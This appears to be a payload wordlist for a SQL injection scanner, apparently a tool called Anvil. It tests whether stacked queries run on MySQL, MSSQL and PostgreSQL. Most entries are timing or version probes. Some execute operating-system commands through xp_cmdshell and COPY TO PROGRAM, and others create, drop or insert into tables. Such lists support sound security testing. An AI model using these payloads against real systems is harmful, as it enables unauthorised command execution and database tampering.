# Stacked Queries SQL Injection Payloads
# These detect if multiple SQL statements can be executed

# Basic stacked queries
'; SELECT 1;--
"; SELECT 1;--
'; SELECT 1#
'; SELECT 1;#
1; SELECT 1;--
'); SELECT 1;--
')); SELECT 1;--

# MySQL stacked (limited support)
'; SELECT SLEEP(2);--
'; SELECT @@version;--
'; SELECT user();--
1; SELECT SLEEP(2);--
'; INSERT INTO log VALUES('test');--

# MSSQL stacked (full support)
'; SELECT 1;--
'; EXEC master..xp_cmdshell 'whoami';--
'; EXEC sp_configure 'show advanced options',1;--
'; WAITFOR DELAY '0:0:2';--
1; EXEC xp_cmdshell('ping 127.0.0.1');--
'; DECLARE @x INT; SET @x=1;--
'; INSERT INTO log VALUES(GETDATE());--

# PostgreSQL stacked (full support)
'; SELECT 1;--
'; SELECT pg_sleep(2);--
'; SELECT version();--
'; COPY (SELECT '') TO PROGRAM 'id';--
1; SELECT pg_sleep(2);--
'; CREATE TABLE test(id INT);--
'; DROP TABLE IF EXISTS anvil_test;--

# Detection patterns (safe)
'; SELECT 'ANVIL_STACK_TEST';--
'; SELECT CONCAT('ANVIL','_','DETECT');--
1; SELECT 'stacked_works';--

# Time-based stacked detection
'; SELECT 1; SELECT SLEEP(2);--
'; SELECT 1; WAITFOR DELAY '0:0:2';--
'; SELECT 1; SELECT pg_sleep(2);--

# Error-based stacked
'; SELECT * FROM nonexistent;--
'; SELECT 1/0;--

# Information gathering (stacked)
'; SELECT @@version;--
'; SELECT user();--
'; SELECT database();--
'; SELECT current_user;--

# Write test (creates evidence)
'; INSERT INTO information_schema.tables VALUES('anvil_test');--
'; UPDATE users SET password='test' WHERE 0=1;--

# Semicolon variations
';SELECT 1;--
'; SELECT 1 ;--
' ; SELECT 1 ; --
'%3BSELECT%201%3B--

# Nested stacked
'; SELECT 1; SELECT 2; SELECT 3;--
'; BEGIN SELECT 1; END;--

